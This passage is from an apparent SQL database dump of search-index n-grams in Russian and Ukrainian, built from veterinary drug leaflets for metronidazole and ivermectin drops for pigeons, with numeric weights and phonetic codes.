годности',0,1,1.5,'с000',1,'*'),(1554420,'светло-желтый','светло-желтый',0,0,0.8667,'с000',1,'*'),(1554421,'светло-желтый порошок','светло-желтый порошок',0,1,1.7,'с000',1,'*'),(1554422,'светло-желтый порошок или','светло-желтый порошок или',0,1,1.8333,'с000',1,'*'),(1554423,'свойства','свойства',0,0,0.5333,'с000',2,'*'),(1554424,'свойства метронидазол','свойства метронидазол',0,1,1.7,'с000',1,'*'),(1554425,'свойства метронидазол относится','свойства метронидазол относится',0,1,2,'с000',1,'*'),(1554426,'синтез','синтез',0,0,0.4,'с000',1,'*'),(1554427,'синтез ее','синтез ее',0,1,1.3,'с000',1,'*'),(1554428,'синтез ее нуклеиновых','синтез ее нуклеиновых',0,1,1.7,'с000',1,'*'),(1554429,'содержит','содержит',0,0,0.5333,'с000',1,'*'),(1554430,'содержит действующее','содержит действующее',0,1,1.6667,'с000',1,'*'),(1554431,'содержит действующее вещество','содержит действующее вещество',0,1,1.9667,'с000',1,'*'),(1554432,'состав','состав',0,0,0.4,'с000',2,'*'),(1554433,'состав 100','состав 100',0,1,1.3333,'с000',1,'*'),(1554434,'состав 100 г','состав 100 г',0,1,1.4,'с000',1,'*'),(1554435,'срок','срок',0,0,0.2667,'с000',1,'*'),(1554436,'срок годности','срок годности',0,1,1.4333,'с000',1,'*'),(1554437,'срок годности 2','срок годности 2',0,1,1.5,'с000',1,'*'),(1554438,'суток','суток',0,0,0.3333,'с000',1,'*'),(1554439,'суток противопоказания','суток противопоказания',0,1,1.7333,'с000',1,'*'),(1554440,'суток противопоказания повышенная','суток противопоказания повышенная',0,1,2,'с000',1,'*'),(1554441,'сухое','сухое',0,0,0.3333,'с000',1,'*'),(1554442,'сухое темное','сухое темное',0,1,1.4,'с000',1,'*'),(1554443,'сухое темное недоступное','сухое темное недоступное',0,1,1.8,'с000',1,'*'),(1554444,'тела','тела',0,0,0.2667,'т000',2,'*'),(1554445,'тела с','тела с',0,1,1.2,'т000',1,'*'),(1554446,'тела с профилактическойцелью','тела с профилактическойцелью',0,1,1.9333,'т000',1,'*'),(1554447,'темное','темное',0,0,0.4,'т000',1,'*'),(1554448,'темное недоступное','темное недоступное',0,1,1.6,'т000',1,'*'),(1554449,'темное недоступное для','темное недоступное для',0,1,1.7333,'т000',1,'*'),(1554450,'температуре','температуре',0,0,0.7333,'т000',1,'*'),(1554451,'температуре от','температуре от',0,1,1.4667,'т000',1,'*'),(1554452,'температуре от 18','температуре от 18',0,1,1.5667,'т000',1,'*'),(1554453,'транспортными','транспортными',0,0,0.8667,'т000',1,'*'),(1554454,'транспортными протеинами','транспортными протеинами',0,1,1.8,'т000',1,'*'),(1554455,'транспортными протеинами анаэробных','транспортными протеинами анаэробных',0,1,2,'т000',1,'*'),(1554456,'трихомонадоз','трихомонадоз',0,0,0.8,'т000',1,'*'),(1554457,'трихомонадоз вызванный','трихомонадоз вызванный',0,1,1.7333,'т000',1,'*'),(1554458,'трихомонадоз вызванный микроорганизмами','трихомонадоз вызванный микроорганизмами',0,1,2,'т000',1,'*'),(1554459,'фармакологические','фармакологические',0,0,1,'ф000',2,'*'),(1554460,'фармакологические свойства','фармакологические свойства',0,1,1.8667,'ф000',2,'*'),(1554461,'фармакологические свойства метронидазол','фармакологические свойства метронидазол',0,1,2,'ф000',1,'*'),(1554462,'форма выпуска','форма выпуска',0,1,1.4333,'ф000',1,'*'),(1554463,'форма выпуска пакеты','форма выпуска пакеты',0,1,1.6667,'ф000',1,'*'),(1554464,'хранение','хранение',0,0,0.5333,'х000',1,'*'),(1554465,'хранение сухое','хранение сухое',0,1,1.4667,'х000',1,'*'),(1554466,'хранение сухое темное','хранение сухое темное',0,1,1.7,'х000',1,'*'),(1554467,'целью','целью',0,0,0.3333,'ц000',2,'*'),(1554468,'целью применяют','целью применяют',0,1,1.5,'ц000',1,'*'),(1554469,'целью применяют в','целью применяют в',0,1,1.5667,'ц000',1,'*'),(1554470,'чем','чем',0,0,0.2,'ч000',1,'*'),(1554471,'чем 19','чем 19',0,1,1.2,'ч000',1,'*'),(1554472,'чем 19 суток','чем 19 суток',0,1,1.4,'ч000',1,'*'),(1554473,'что','что',0,0,0.2,'ч000',1,'*'),(1554474,'что ведет','что ведет',0,1,1.3,'ч000',1,'*'),(1554475,'что ведет к','что ведет к',0,1,1.3667,'ч000',1,'*'),(1554476,'чувствительность','чувствительность',0,0,1,'ч000',1,'*'),(1554477,'чувствительность к','чувствительность к',0,1,1.6,'ч000',1,'*'),(1554478,'чувствительность к метронидазолу','чувствительность к метронидазолу',0,1,2,'ч000',1,'*'),(1554479,'чувствительными','чувствительными',0,0,1,'ч000',1,'*'),(1554480,'чувствительными к','чувствительными к',0,1,1.5667,'ч000',1,'*'),(1554481,'чувствительными к метронидазолу','чувствительными к метронидазолу',0,1,2,'ч000',1,'*'),(1554482,'эффективен','эффективен',0,0,0.6667,'э000',1,'*'),(1554483,'эффективен против','эффективен против',0,1,1.5667,'э000',1,'*'),(1554484,'эффективен против trichomonas','эффективен против trichomonas',0,1,1.9667,'э36252',1,'*'),(1554854,'1 крапля','1 крапля',0,1,1.2667,'к000',1,'*'),(1554855,'1 крапля для','1 крапля для',0,1,1.4,'к000',1,'*'),(1554856,'1 крапля на','1 крапля на',0,1,1.3667,'к000',1,'*'),(1554857,'10 мл','10 мл',0,1,1.1667,'м000',1,'*'),(1554858,'10 мл зберiгання','10 мл зберiгання',0,1,1.5333,'м000',1,'*'),(1554859,'100 г не','100 г не',0,1,1.2667,'г000',1,'*'),(1554860,'2 годин','2 годин',0,1,1.2333,'г000',1,'*'),(1554861,'2 годин до','2 годин до',0,1,1.3333,'г000',1,'*'),(1554862,'2 краплі','2 краплі',0,1,1.2667,'к000',1,'*'),(1554863,'2 краплі на','2 краплі на',0,1,1.3667,'к000',1,'*'),(1554864,'2 роки виробник','2 роки виробник',0,1,1.5,'р000',1,'*'),(1554865,'2-3 доби','2-3 доби',0,1,1.2667,'д000',1,'*'),(1554866,'2-3 доби дія','2-3 доби дія',0,1,1.4,'д000',1,'*'),(1554867,'2463','2463',0,0,0.4,'',1,'*'),(1554868,'250 г 2','250 г 2',0,1,1.2333,'г000',1,'*'),(1554869,'30 діб','30 діб',0,1,1.2,'д000',1,'*'),(1554870,'30 діб застосування','30 діб застосування',0,1,1.6333,'д000',1,'*'),(1554871,'4-6 тижнів протипоказання','4-6 тижнів протипоказання',0,1,1.8333,'т000',1,'*'),(1554872,'500 г','500 г',0,1,1.1667,'г000',1,'*'),(1554873,'500 г 1','500 г 1',0,1,1.2333,'г000',1,'*'),(1554874,'8 тижнів','8 тижнів',0,1,1.2667,'т000',1,'*'),(1554875,'8 тижнів або','8 тижнів або',0,1,1.4,'т000',1,'*'),(1554876,'dlya golubiv krapli','dlya golubiv krapli',0,1,1.6333,'D42412614',1,'*'),(1554877,'golubiv krapli','golubiv krapli',0,1,1.4667,'G412614',1,'*'),(1554878,'ivermikol','ivermikol',0,0,0.6,'I16524',1,'*'),(1554879,'ivermikol dlya','ivermikol dlya',0,1,1.4667,'I1652434',1,'*'),(1554880,'ivermikol dlya golubiv','ivermikol dlya golubiv',0,1,1.7333,'I1652434241',1,'*'),(1554881,'krapli','krapli',0,0,0.4,'K614',1,'*'),(1554882,'qp54aa','qp54aa',0,0,0.4,'Q100',1,'*'),(1554883,'qp54aa авермектини','qp54aa авермектини',0,1,1.6,'Q100',1,'*'),(1554884,'qp54aa авермектини qp54aa01','qp54aa авермектини qp54aa01',0,1,1.9,'Q121',1,'*'),(1554885,'qp54aa01','qp54aa01',0,0,0.5333,'Q100',1,'*'),(1554886,'qp54aa01 івермектин','qp54aa01 івермектин',0,1,1.6333,'Q100',1,'*'),(1554887,'qp54aa01 івермектин препарат','qp54aa01 івермектин препарат',0,1,1.9333,'Q100',1,'*'),(1554888,'γ-аміномасляну','γ-аміномасляну',0,0,0.9333,'γ000',1,'*'),(1554889,'γ-аміномасляну кислоту','γ-аміномасляну кислоту',0,1,1.7333,'γ000',1,'*'),(1554890,'γ-аміномасляну кислоту гамк','γ-аміномасляну кислоту гамк',0,1,1.9,'γ000',1,'*'),(1554891,'і в','і в',0,1,1.1,'і000',2,'*'),(1554892,'і в травний','і в травний',0,1,1.3667,'і000',1,'*'),(1554893,'і допускати','і допускати',0,1,1.3667,'і000',1,'*'),(1554894,'і допускати її','і допускати її',0,1,1.4667,'і000',1,'*'),(1554895,'і загибелі','і загибелі',0,1,1.3333,'і000',1,'*'),(1554896,'і загибелі дорослі','і загибелі дорослі',0,1,1.6,'і000',1,'*'),(1554897,'і нематод','і нематод',0,1,1.3,'і000',1,'*'),(1554898,'і нематод що','і нематод що',0,1,1.4,'і000',1,'*'),(1554899,'і профілактика','і профілактика',0,1,1.4667,'і000',1,'*'),(1554900,'і профілактика голубів','і профілактика голубів',0,1,1.7333,'і000',1,'*'),(1554901,'її','її',0,0,0.1333,'ї000',5,'*'),(1554902,'її до','її до',0,1,1.1667,'ї000',1,'*'),(1554903,'її до маленьких','її до маленьких',0,1,1.5,'ї000',1,'*'),(1554904,'івермікол','івермікол',0,0,0.6,'і000',1,'*'),(1554905,'івермікол для','івермікол для',0,1,1.4333,'і000',1,'*'),(1554906,'івермікол для голубів','івермікол для голубів',0,1,1.7,'і000',1,'*'),(1554907,'івермектин','івермектин',0,0,0.6667,'і000',1,'*'),(1554908,'івермектин належить','івермектин належить',0,1,1.6333,'і000',1,'*'),(1554909,'івермектин належить до','івермектин належить до',0,1,1.7333,'і000',1,'*'),(1554910,'івермектин препарат','івермектин препарат',0,1,1.6333,'і000',1,'*'),(1554911,'івермектин препарат має','івермектин препарат має',0,1,1.7667,'і000',1,'*'),(1554912,'івермектин фармакологічні','івермектин фармакологічні',0,1,1.8333,'і000',1,'*'),(1554913,'івермектин фармакологічні властивості','івермектин фармакологічні властивості',0,1,2,'і000',1,'*'),(1554914,'івермектину','івермектину',0,0,0.7333,'і000',1,'*'),(1554915,'івермектину полягає','івермектину полягає',0,1,1.6333,'і000',1,'*'),(1554916,'івермектину полягає у','івермектину полягає у',0,1,1.7,'і000',1,'*'),(1554917,'імпульсів','імпульсів',0,0,0.6,'і000',1,'*'),(1554918,'імпульсів ектопаразитів','імпульсів ектопаразитів',0,1,1.7667,'і000',1,'*'),(1554919,'імпульсів ектопаразитів і','імпульсів ектопаразитів і',0,1,1.8333,'і000',1,'*'),(1554920,'їх паралічу','їх паралічу',0,1,1.3667,'ї000',1,'*'),(1554921,'їх паралічу і','їх паралічу і',0,1,1.4333,'ї000',1,'*'),(1554922,'їх проточною','їх проточною',0,1,1.4,'ї000',1,'*'),(1554923,'їх проточною водою','їх проточною водою',0,1,1.6,'ї000',1,'*'),(1554924,'або вагою','або вагою',0,1,1.3,'а000',1,'*'),(1554925,'або вагою менше','або вагою менше',0,1,1.5,'а000',1,'*'),(1554926,'або нервово-м','або нервово-м',0,1,1.4333,'а000',1,'*'),(1554927,'або нервово-м язової','або нервово-м язової',0,1,1.6667,'а000',1,'*'),(1554928,'або слизові','або слизові',0,1,1.3667,'а000',1,'*'),(1554929,'або слизові оболонки','або слизові оболонки',0,1,1.6667,'а000',1,'*'),(1554930,'авермектини','авермектини',0,0,0.7333,'а000',1,'*'),(1554931,'авермектини qp54aa01','авермектини qp54aa01',0,1,1.6667,'а210',1,'*'),(1554932,'авермектини qp54aa01 івермектин','авермектини qp54aa01 івермектин',0,1,2,'а210',1,'*'),(1554933,'активний','активний',0,0,0.5333,'а000',1,'*'),(1554934,'активний відносно','активний відносно',0,1,1.5667,'а000',1,'*'),(1554935,'активний відносно вошей','активний відносно вошей',0,1,1.7667,'а000',1,'*'),(1554936,'атсvet','атсvet',0,0,0.4,'а130',1,'*'),(1554937,'атсvet qp54aa','атсvet qp54aa',0,1,1.4333,'а1321',1,'*'),(1554938,'атсvet qp54aa авермектини','атсvet qp54aa авермектини',0,1,1.8333,'а1321',1,'*'),(1554939,'бліх','бліх',0,0,0.2667,'б000',1,'*'),(1554940,'бліх пухопероїдів','бліх пухопероїдів',0,1,1.5667,'б000',1,'*'),(1554941,'бліх пухопероїдів та','бліх пухопероїдів та',0,1,1.6667,'б000',1,'*'),(1554942,'блокаді','блокаді',0,0,0.4667,'б000',1,'*'),(1554943,'блокаді нервової','блокаді нервової',0,1,1.5333,'б000',1,'*'),(1554944,'блокаді нервової або','блокаді нервової або',0,1,1.6667,'б000',1,'*'),(1554945,'блохами','блохами',0,0,0.4667,'б000',1,'*'),(1554946,'блохами пухопероїдами','блохами пухопероїдами',0,1,1.7,'б000',1,'*'),(1554947,'блохами пухопероїдами та','блохами пухопероїдами та',0,1,1.8,'б000',1,'*'),(1554948,'в наступних','в наступних',0,1,1.3667,'в000',1,'*'),(1554949,'в наступних кількостях','в наступних кількостях',0,1,1.7333,'в000',1,'*'),(1554950,'в травний','в травний',0,1,1.3,'в000',1,'*'),(1554951,'в травний канал','в травний канал',0,1,1.5,'в000',1,'*'),(1554952,'відносно вошей','відносно вошей',0,1,1.4667,'в000',1,'*'),(1554953,'відносно вошей кліщів','відносно вошей кліщів',0,1,1.7,'в000',1,'*'),(1554954,'відразу промити','відразу промити',0,1,1.5,'в000',1,'*'),(1554955,'відразу промити їх','відразу промити їх',0,1,1.6,'в000',1,'*'),(1554956,'вагою 250','вагою 250',0,1,1.3,'в000',1,'*'),(1554957,'вагою 250 г','вагою 250 г',0,1,1.3667,'в000',1,'*'),(1554958,'вагою менше','вагою менше',0,1,1.3667,'в000',1,'*'),(1554959,'вагою менше 100','вагою менше 100',0,1,1.5,'в000',1,'*'),(1554960,'ветеринарної','ветеринарної',0,0,0.8,'в000',2,'*'),(1554961,'ветеринарної медицини','ветеринарної медицини',0,1,1.7,'в000',2,'*'),(1554962,'ветеринарної медицини після','ветеринарної медицини після',0,1,1.9,'в000',1,'*'),(1554963,'вимити','вимити',0,0,0.4,'в000',1,'*'),(1554964,'вимити руки','вимити руки',0,1,1.3667,'в000',1,'*'),(1554965,'вимити руки з','вимити руки з',0,1,1.4333,'в000',1,'*'),(1554966,'випадковому','випадковому',0,0,0.7333,'в000',1,'*'),(1554967,'випадковому попаданні','випадковому попаданні',0,1,1.7,'в000',1,'*'),(1554968,'випадковому попаданні препарату','випадковому попаданні препарату',0,1,2,'в000',1,'*'),(1554969,'випуску полімерні','випуску полімерні',0,1,1.5667,'в000',1,'*'),(1554970,'випуску полімерні флакони','випуску полімерні флакони',0,1,1.8333,'в000',1,'*'),(1554971,'висихання','висихання',0,0,0.6,'в000',1,'*'),(1554972,'висихання пір\'яного','висихання пір',0,1,1.6333,'в000',1,'*'),(1554973,'висихання пір\'яного покриву','висихання пір покриву',0,1,1.9,'в000',1,'*'),(1554974,'властивості атсvet','властивості атсvet',0,1,1.6,'в130',1,'*'),(1554975,'властивості атсvet qp54aa','властивості атсvet qp54aa',0,1,1.8333,'в1321',1,'*'),(1554976,'внаслідок','внаслідок',0,0,0.6,'в000',2,'*'),(1554977,'внаслідок чого','внаслідок чого',0,1,1.4667,'в000',1,'*'),(1554978,'внаслідок чого порушується','внаслідок чого порушується',0,1,1.8667,'в000',1,'*'),(1554979,'водою після','водою після',0,1,1.3667,'в000',1,'*'),(1554980,'водою після закінчення','водою після закінчення',0,1,1.7333,'в000',1,'*'),(1554981,'вошами','вошами',0,0,0.4,'в000',1,'*'),(1554982,'вошами блохами','вошами блохами',0,1,1.4667,'в000',1,'*'),(1554983,'вошами блохами пухопероїдами','вошами блохами пухопероїдами',0,1,1.9333,'в000',1,'*'),(1554984,'вошей','вошей',0,0,0.3333,'в000',1,'*'),(1554985,'вошей кліщів','вошей кліщів',0,1,1.4,'в000',1,'*'),(1554986,'вошей кліщів бліх','вошей кліщів бліх',0,1,1.5667,'в000',1,'*'),(1554987,'впливу на γ-аміномасляну','впливу на γ-аміномасляну',0,1,1.8,'в000',1,'*'),(1554988,'г 1 крапля','г 1 крапля',0,1,1.3333,'г000',1,'*'),(1554989,'г 2 краплі','г 2 краплі',0,1,1.3333,'г000',1,'*'),(1554990,'г не','г не',0,1,1.1333,'г000',1,'*'),(1554991,'г не застосовувати','г не застосовувати',0,1,1.6,'г000',1,'*'),(1554992,'гамк','гамк',0,0,0.2667,'г000',1,'*'),(1554993,'гамк внаслідок','гамк внаслідок',0,1,1.4667,'г000',1,'*'),(1554994,'гамк внаслідок чого','гамк внаслідок чого',0,1,1.6333,'г000',1,'*'),(1554995,'гинуть','гинуть',0,0,0.4,'г000',1,'*'),(1554996,'гинуть через','гинуть через',0,1,1.4,'г000',1,'*'),(1554997,'гинуть через 2-3','гинуть через 2-3',0,1,1.5333,'г000',1,'*'),(1554998,'гладити','гладити',0,0,0.4667,'г000',1,'*'),(1554999,'гладити і','гладити і',0,1,1.3,'г000',1,'*'),(1555000,'гладити і допускати','гладити і допускати',0,1,1.6333,'г000',1,'*'),(1555001,'годин','годин',0,0,0.3333,'г000',1,'*'),(1555002,'годин до','годин до',0,1,1.2667,'г000',1,'*'),(1555003,'годин до повного','годин до повного',0,1,1.5333,'г000',1,'*'),(1555004,'голубів краплі','голубів краплі',0,1,1.4667,'г000',1,'*'),(1555005,'голуба','голуба',0,0,0.4,'г000',2,'*'),(1555006,'голуба вагою','голуба вагою',0,1,1.4,'г000',1,'*'),(1555007,'голуба вагою 250','голуба вагою 250',0,1,1.5333,'г000',1,'*'),(1555008,'голубавагою','голубавагою',0,0,0.7333,'г000',1,'*'),(1555009,'голубавагою 500','голубавагою 500',0,1,1.5,'г000',1,'*'),(1555010,'голубавагою 500 г','голубавагою 500 г',0,1,1.5667,'г000',1,'*'),(1555011,'групи','групи',0,0,0.3333,'г000',2,'*'),(1555012,'групи макроциклічних','групи макроциклічних',0,1,1.6667,'г000',1,'*'),(1555013,'групи макроциклічних лактонів','групи макроциклічних лактонів',0,1,1.9667,'г000',1,'*'),(1555014,'дії активний','дії активний',0,1,1.4,'д000',1,'*'),(1555015,'дії активний відносно','дії активний відносно',0,1,1.7,'д000',1,'*'),(1555016,'діб застосування','діб застосування',0,1,1.5333,'д000',1,'*'),(1555017,'діб застосування лікування','діб застосування лікування',0,1,1.8667,'д000',1,'*'),(1555018,'дітей при','дітей при',0,1,1.3,'д000',1,'*'),(1555019,'дітей при випадковому','дітей при випадковому',0,1,1.7,'д000',1,'*'),(1555020,'діюча','діюча',0,0,0.3333,'д000',1,'*'),(1555021,'діюча речовина','діюча речовина',0,1,1.4667,'д000',1,'*'),(1555022,'діюча речовина препарату','діюча речовина препарату',0,1,1.8,'д000',1,'*'),(1555023,'діючу','діючу',0,0,0.3333,'д000',2,'*'),(1555024,'діючу речовину','діючу речовину',0,1,1.4667,'д000',2,'*'),(1555025,'діючу речовину івермектин','діючу речовину івермектин',0,1,1.8333,'д000',1,'*'),(1555026,'дія івермектину','дія івермектину',0,1,1.5,'д000',1,'*'),(1555027,'дія івермектину полягає','дія івермектину полягає',0,1,1.7667,'д000',1,'*'),(1555028,'дія препарату','дія препарату',0,1,1.4333,'д000',1,'*'),(1555029,'дія препарату триває','дія препарату триває',0,1,1.6667,'д000',1,'*'),(1555030,'декоративних птахів папуг','декоративних птахів папуг',0,1,1.8333,'д000',1,'*'),(1555031,'для голубів краплі','для голубів краплі',0,1,1.6,'д000',1,'*'),(1555032,'для декоративних','для декоративних',0,1,1.5333,'д000',1,'*'),(1555033,'для декоративних птахів','для декоративних птахів',0,1,1.7667,'д000',1,'*'),(1555034,'до 30 діб','до 30 діб',0,1,1.3,'д000',1,'*'),(1555035,'до їх','до їх',0,1,1.1667,'д000',1,'*'),(1555036,'до їх паралічу','до їх паралічу',0,1,1.4667,'д000',1,'*'),(1555037,'до лікаря','до лікаря',0,1,1.3,'д000',1,'*'),(1555038,'до лікаря ветеринарної','до лікаря ветеринарної',0,1,1.7333,'д000',1,'*'),(1555039,'до маленьких','до маленьких',0,1,1.4,'д000',1,'*'),(1555040,'до маленьких дітей','до маленьких дітей',0,1,1.6,'д000',1,'*'),(1555041,'до повного','до повного',0,1,1.3333,'д000',1,'*'),(1555042,'до повного висихання','до повного висихання',0,1,1.6667,'д000',1,'*'),(1555043,'до хімічної','до хімічної',0,1,1.3667,'д000',1,'*'),(1555044,'до хімічної групи','до хімічної групи',0,1,1.5667,'д000',1,'*'),(1555045,'доби дія','доби дія',0,1,1.2667,'д000',1,'*'),(1555046,'доби дія препарату','доби дія препарату',0,1,1.6,'д000',1,'*'),(1555047,'дозування препарат застосовувати','дозування препарат застосовувати',0,1,2,'д000',1,'*'),(1555048,'допускати','допускати',0,0,0.6,'д000',1,'*'),(1555049,'допускати її','допускати її',0,1,1.4,'д000',1,'*'),(1555050,'допускати її до','допускати її до',0,1,1.5,'д000',1,'*'),(1555051,'дорослі','дорослі',0,0,0.4667,'д000',1,'*'),(1555052,'дорослі паразити','дорослі паразити',0,1,1.5333,'д000',1,'*'),(1555053,'дорослі паразити які','дорослі паразити які',0,1,1.6667,'д000',1,'*'),(1555054,'ектопаразитів','ектопаразитів',0,0,0.8667,'е000',1,'*'),(1555055,'ектопаразитів і','ектопаразитів і',0,1,1.5,'е000',1,'*'),(1555056,'ектопаразитів і нематод','ектопаразитів і нематод',0,1,1.7667,'е000',1,'*'),(1555057,'ектопаразитами','ектопаразитами',0,0,0.9333,'е000',1,'*'),(1555058,'ектопаразитами кліщами','ектопаразитами кліщами',0,1,1.7333,'е000',1,'*'),(1555059,'ектопаразитами кліщами вошами','ектопаразитами кліщами вошами',0,1,1.9667,'е000',1,'*'),(1555060,'з милом','з милом',0,1,1.2333,'з000',1,'*'),(1555061,'з милом форма','з милом форма',0,1,1.4333,'з000',1,'*'),(1555062,'загибелі','загибелі',0,0,0.5333,'з000',1,'*'),(1555063,'загибелі дорослі','загибелі дорослі',0,1,1.5333,'з000',1,'*'),(1555064,'загибелі дорослі паразити','загибелі дорослі паразити',0,1,1.8333,'з000',1,'*'),(1555065,'закінчення','закінчення',0,0,0.6667,'з000',1,'*'),(1555066,'закінчення обробки','закінчення обробки',0,1,1.6,'з000',1,'*'),(1555067,'закінчення обробки птиці','закінчення обробки птиці',0,1,1.8,'з000',1,'*'),(1555068,'запобігати','запобігати',0,0,0.6667,'з000',1,'*'),(1555069,'запобігати попаданню','запобігати попаданню',0,1,1.6667,'з000',1,'*'),(1555070,'запобігати попаданню препарату','запобігати попаданню препарату',0,1,2,'з000',1,'*'),(1555071,'застереження запобігати','застереження запобігати',0,1,1.7667,'з000',1,'*'),(1555072,'застереження запобігати попаданню','застереження запобігати попаданню',0,1,2,'з000',1,'*'),(1555073,'застосовувати зовнішньо','застосовувати зовнішньо',0,1,1.7667,'з000',1,'*'),(1555074,'застосовувати зовнішньо одноразово','застосовувати зовнішньо одноразово',0,1,2,'з000',1,'*'),(1555075,'застосовувати під','застосовувати під',0,1,1.5667,'з000',1,'*'),(1555076,'застосовувати під час','застосовувати під час',0,1,1.7,'з000',1,'*'),(1555077,'застосовувати птахам','застосовувати птахам',0,1,1.6667,'з000',1,'*'),(1555078,'застосовувати птахам молодше','застосовувати птахам молодше',0,1,1.9333,'з000',1,'*'),(1555079,'застосовувати хворим','застосовувати хворим',0,1,1.6667,'з000',1,'*'),(1555080,'застосовувати хворим та','застосовувати хворим та',0,1,1.7667,'з000',1,'*'),(1555081,'застосування лікування','застосування лікування',0,1,1.7333,'з000',1,'*'),(1555082,'застосування лікування і','застосування лікування і',0,1,1.8,'з000',1,'*'),(1555083,'зберiгання сухе','зберiгання сухе',0,1,1.5,'з000',1,'*'),(1555084,'зберiгання сухе темне','зберiгання сухе темне',0,1,1.7,'з000',1,'*'),(1555085,'звернутися','звернутися',0,0,0.6667,'з000',1,'*'),(1555086,'звернутися до','звернутися до',0,1,1.4333,'з000',1,'*'),(1555087,'звернутися до лікаря','звернутися до лікаря',0,1,1.6667,'з000',1,'*'),(1555088,'зовнішньо','зовнішньо',0,0,0.6,'з000',1,'*'),(1555089,'зовнішньо одноразово','зовнішньо одноразово',0,1,1.6667,'з000',1,'*'),(1555090,'зовнішньо одноразово наносити','зовнішньо одноразово наносити',0,1,1.9667,'з000',1,'*'),(1555091,'кількостях','кількостях',0,0,0.6667,'к000',1,'*'),(1555092,'кількостях 1','кількостях 1',0,1,1.4,'к000',1,'*'),(1555093,'кількостях 1 крапля','кількостях 1 крапля',0,1,1.6333,'к000',1,'*'),(1555094,'канал','канал',0,0,0.3333,'к000',1,'*'),(1555095,'канал при','канал при',0,1,1.3,'к000',1,'*'),(1555096,'канал при появі','канал при появі',0,1,1.5,'к000',1,'*'),(1555097,'канарок','канарок',0,0,0.4667,'к000',1,'*'),(1555098,'канарок у','канарок у',0,1,1.3,'к000',1,'*'),(1555099,'канарок у разі','канарок у разі',0,1,1.4667,'к000',1,'*'),(1555100,'кислоту','кислоту',0,0,0.4667,'к000',1,'*'),(1555101,'кислоту гамк','кислоту гамк',0,1,1.4,'к000',1,'*'),(1555102,'кислоту гамк внаслідок','кислоту гамк внаслідок',0,1,1.7333,'к000',1,'*'),(1555103,'кишкових','кишкових',0,0,0.5333,'к000',1,'*'),(1555104,'кишкових нематод','кишкових нематод',0,1,1.5333,'к000',1,'*'),(1555105,'кишкових нематод діюча','кишкових нематод діюча',0,1,1.7333,'к000',1,'*'),(1555106,'кишкових нематодозах','кишкових нематодозах',0,1,1.6667,'к000',1,'*'),(1555107,'кишкових нематодозах дозування','кишкових нематодозах дозування',0,1,2,'к000',1,'*'),(1555108,'клінічних','клінічних',0,0,0.6,'к000',1,'*'),(1555109,'клінічних ознак','клінічних ознак',0,1,1.5,'к000',1,'*'),(1555110,'клінічних ознак ускладнень','клінічних ознак ускладнень',0,1,1.8667,'к000',1,'*'),(1555111,'кліщів','кліщів',0,0,0.4,'к000',1,'*'),(1555112,'кліщів бліх','кліщів бліх',0,1,1.3667,'к000',1,'*'),(1555113,'кліщів бліх пухопероїдів','кліщів бліх пухопероїдів',0,1,1.8,'к000',1,'*'),(1555114,'кліщами','кліщами',0,0,0.4667,'к000',1,'*'),(1555115,'кліщами вошами','кліщами вошами',0,1,1.4667,'к000',1,'*'),(1555116,'кліщами вошами блохами','кліщами вошами блохами',0,1,1.7333,'к000',1,'*'),(1555117,'краплі','краплі',0,0,0.4,'к000',1,'*'),(1555118,'краплі на','краплі на',0,1,1.3,'к000',1,'*'),(1555119,'краплі на голубавагою','краплі на голубавагою',0,1,1.7,'к000',1,'*'),(1555120,'крапля','крапля',0,0,0.4,'к000',1,'*'),(1555121,'крапля для','крапля для',0,1,1.3333,'к000',1,'*'),(1555122,'крапля для декоративних','крапля для декоративних',0,1,1.7667,'к000',1,'*'),(1555123,'крапля на','крапля на',0,1,1.3,'к000',1,'*'),(1555124,'крапля на голуба','крапля на голуба',0,1,1.5333,'к000',1,'*'),(1555125,'купати','купати',0,0,0.4,'к000',1,'*'),(1555126,'купати протягом','купати протягом',0,1,1.5,'к000',1,'*'),(1555127,'купати протягом 2','купати протягом 2',0,1,1.5667,'к000',1,'*'),(1555128,'лікаря','лікаря',0,0,0.4,'л000',2,'*'),(1555129,'лікаря ветеринарної','лікаря ветеринарної',0,1,1.6333,'л000',2,'*'),(1555130,'лікаря ветеринарної медицини','лікаря ветеринарної медицини',0,1,1.9333,'л000',2,'*'),(1555131,'лікування і профілактика','лікування і профілактика',0,1,1.8,'л000',1,'*'),(1555132,'лактонів','лактонів',0,0,0.5333,'л000',1,'*'),(1555133,'лактонів фармакологічна','лактонів фармакологічна',0,1,1.7667,'л000',1,'*'),(1555134,'лактонів фармакологічна дія','лактонів фармакологічна дія',0,1,1.9,'л000',1,'*'),(1555135,'линьки не','линьки не',0,1,1.3,'л000',1,'*'),(1555136,'линьки не застосовувати','линьки не застосовувати',0,1,1.7667,'л000',1,'*'),(1555137,'лопатками','лопатками',0,0,0.6,'л000',1,'*'),(1555138,'лопатками птиці','лопатками птиці',0,1,1.5,'л000',1,'*'),(1555139,'лопатками птиці в','лопатками птиці в',0,1,1.5667,'л000',1,'*'),(1555140,'між','між',0,0,0.2,'м000',1,'*'),(1555141,'між лопатками','між лопатками',0,1,1.4333,'м000',1,'*'),(1555142,'між лопатками птиці','між лопатками птиці',0,1,1.6333,'м000',1,'*'),(1555143,'містить діючу','містить діючу',0,1,1.4333,'м000',2,'*'),(1555144,'містить діючу речовину','містить діючу речовину',0,1,1.7333,'м000',2,'*'),(1555145,'має широкий','має широкий',0,1,1.3667,'м000',1,'*'),(1555146,'має широкий спектр','має широкий спектр',0,1,1.6,'м000',1,'*'),(1555147,'макроциклічних','макроциклічних',0,0,0.9333,'м000',1,'*'),(1555148,'макроциклічних лактонів','макроциклічних лактонів',0,1,1.7667,'м000',1,'*'),(1555149,'макроциклічних лактонів фармакологічна','макроциклічних лактонів фармакологічна',0,1,2,'м000',1,'*'),(1555150,'маленьких','маленьких',0,0,0.6,'м000',1,'*'),(1555151,'маленьких дітей','маленьких дітей',0,1,1.5,'м000',1,'*'),(1555152,'маленьких дітей при','маленьких дітей при',0,1,1.6333,'м000',1,'*'),(1555153,'медицини','медицини',0,0,0.5333,'м000',2,'*'),(1555154,'медицини після','медицини після',0,1,1.4667,'м000',1,'*'),(1555155,'медицини після обробки','медицини після обробки',0,1,1.7333,'м000',1,'*'),(1555156,'менше','менше',0,0,0.3333,'м000',2,'*'),(1555157,'менше 100','менше 100',0,1,1.3,'м000',1,'*'),(1555158,'менше 100 г','менше 100 г',0,1,1.3667,'м000',1,'*'),(1555159,'милом','милом',0,0,0.3333,'м000',1,'*'),(1555160,'милом форма','милом форма',0,1,1.3667,'м000',1,'*'),(1555161,'милом форма випуску','милом форма випуску',0,1,1.6333,'м000',1,'*'),(1555162,'мл зберiгання','мл зберiгання',0,1,1.4333,'м000',1,'*'),(1555163,'мл зберiгання 